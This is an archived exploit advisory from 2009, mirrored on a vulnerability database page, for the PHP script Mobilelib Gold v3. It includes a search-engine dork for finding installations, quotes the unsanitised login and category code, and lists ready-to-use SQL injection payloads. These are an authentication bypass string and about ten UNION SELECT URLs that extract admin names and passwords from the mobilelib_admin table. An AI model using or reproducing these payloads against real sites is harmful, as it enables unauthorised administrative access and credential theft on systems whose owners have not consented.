Lucene search
K

Mobilelib Gold 3.0 SQL Injection

🗓️ 05 Aug 2009 00:00:00Reported by SwEET-DeViLType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

Mobilelib Gold v3 SQL Injection vulnerabilities

Code
`------------------Mobilelib Gold v3 (Auth Bypass/SQL) Multiple Remote Vulnerabilities----------------------------  
#   
# #### # ### ## ### #### #### ### ##### #### #### ### # ### #### ######  
## # # ## # # # # # # # # # # # # # # # # # # # ## # # # # # #  
# # # # # # # # # # # # # # # # # # # # # # # # #   
# # ### # # ### # # ## ### ### # # # # ### ## # # # ### #   
#### # # #### # # ###### # # # # # # # # # # # # # # #   
# # # # # # # # # # # # # # ## # # # # # # # ## # #   
## ##### ## ###### ### ### #### ### # # ### #### #### ### # ### # #### ###   
  
  
#----------------------------------------------------------------------------------------------------------------  
Script : Mobilelib Gold  
version : 3.0  
Language: PHP  
Site: http://www.ac4p.com  
Dork: intext:Powered by Mobilelib Gold v3  
Found by: SwEET-DeViL  
  
need magic_quotes_gpc = Off  
  
#----------------------------------------------------------------------------------------------------------------  
  
)=> cp/auth.php || Auth Bypass SQL Injection Vulnerability  
.................................................................................................................  
$adminName=$_POST['adminName'];  
$adminName=strip_tags($adminName);  
$Xadminpass=strip_tags($Xadminpass);  
$adminlogin=@mysql_query("SELECT * FROM mobilelib_admin WHERE adminn='$adminName' AND adminpass='$Xadminpass'");  
.................................................................................................................  
#Exploit:  
  
username : 'or 1=1/*  
  
  
  
)=> artcat.php || Remote SQL Injection Vulnerability  
.................................................................................................................  
if($_GET['cid'])  
{  
$cid = intval( $_GET['cid'] );  
$cid = preg_replace("/'\/<>\"/","",$_GET['cid']); //X  
.................................................................................................................  
  
  
#Exploit:  
  
http://WWW.Site.Com/goldv3/artcat.php?cid=-1'+union+select+adminpass,2,adminn,4,5+from+mobilelib_admin/*  
-----------------------------------------------------------------------------------------------------------------  
  
  
  
.................................................................................................................  
  
)=> show.php || Remote SQL Injection Vulnerability  
#Exploit:  
  
http://WWW.Site.Com/goldv3/show.php?cat=games&catid=-1'+union+select+1,2,adminpass,4,5,adminn,7,8+from+mobilelib_admin/*  
  
http://WWW.Site.Com/goldv3/show.php?cat=pro&catid=-1'+union+select+1,2,adminn,adminpass,5,6,7,8,9+from+mobilelib_admin/*  
  
http://WWW.Site.Com/goldv3/show.php?cat=themes&catid=-1'+union+select+1,2,3,4,adminn,adminpass,7+from+mobilelib_admin/*  
  
http://WWW.Site.Com/goldv3/show.php?cat=wallpapers&catid=-1'+union+select+1,2,3,4,adminn,adminpass,7+from+mobilelib_admin/*  
  
http://WWW.Site.Com/goldv3/show.php?cat=blue&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8+from+mobilelib_admin/*  
  
http://WWW.Site.Com/goldv3/show.php?cat=mms&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8+from+mobilelib_admin/*  
  
http://WWW.Site.Com/goldv3/show.php?cat=sound&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8,9+from+mobilelib_admin/*  
  
http://WWW.Site.Com/goldv3/show.php?cat=vido&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8,9,10+from+mobilelib_admin/*  
  
http://WWW.Site.Com/goldv3/show.php?cat=msgs&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8+from+mobilelib_admin/*  
-----------------------------------------------------------------------------------------------------------------  
  
  
/-------------www.arab4services.net-----------------\  
|+------------------------------------------------+ |  
|| SwEET-DeViL & viP HaCkEr | |  
|| gamr-14(at)hotmail.com | |  
|+------------------------------------------------+ |  
\---------------------------------------------------/  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Aug 2009 00:00Current
0.3Low risk
Vulners AI Score0.3
25